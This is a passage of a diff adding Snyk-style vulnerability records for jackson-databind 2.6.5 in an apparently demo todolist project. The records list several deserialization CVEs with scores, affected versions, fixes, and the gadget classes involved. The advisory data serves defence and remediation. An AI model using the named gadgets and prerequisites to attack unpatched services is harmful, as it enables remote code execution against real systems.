+ "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.162608Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:54.679784Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:17.073265Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.jelly.impl.Embedded` (aka `commons-jelly`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2682)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.92404", + "probability": "0.04399", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11620" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-h4rc-386g-6m85" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-04-08T10:55:38.169333Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-04-08T00:42:23Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-04-08T00:42:23Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:17.073265Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564888", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2680", + "title": "GitHub Issues" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:17.355553Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.585105Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": 
"high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.933985Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:17.355553Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.585105Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.springframework.aop.config.MethodLocatingFactoryBean` (aka `spring-aop`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issues](https://github.com/FasterXML/jackson-databind/issues/2680)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.92902", + "probability": "0.05021", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11619" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-27xj-rqx5-2255" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-04-08T10:59:04.995807Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-04-08T00:42:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-04-08T00:42:25Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.585105Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "XuYuanzhen" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2704", + "title": "Github Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:25.351249Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.587184Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + 
"baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:40.439153Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:25.351249Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.587184Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool` (`xalan2`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70)\n- [Github Issue](https://github.com/FasterXML/jackson-databind/issues/2704)\n", + "epssDetails": { + "percentile": "0.93100", + "probability": "0.05308", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14062" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c265-37vj-cwcc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-05-29T15:36:30.302636Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-05-01T15:36:06Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-05-29T15:36:05Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.587184Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572300", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Al1ex@knownsec" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.5)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2765", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.781685Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.570033Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + 
"baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.171514Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.781685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.570033Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.jsecurity.realm.jndi.JndiRealmFactory`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2765)\n", + "epssDetails": { + "percentile": "0.91500", + "probability": "0.03413", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14195" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mc6h-4qgp-37qh" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-14T14:48:40.820120Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.5)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-14T14:45:09Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-06-14T15:32:14Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.570033Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Topsec" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2688", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:42.075545Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.574354Z" + } + ], + "cvssSources": [ + { + 
"type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:40.405517Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:42.075545Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.574354Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `oadd.org.apache.xalan.lib.sql.JNDIConnectionPool` (`apache/drill`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
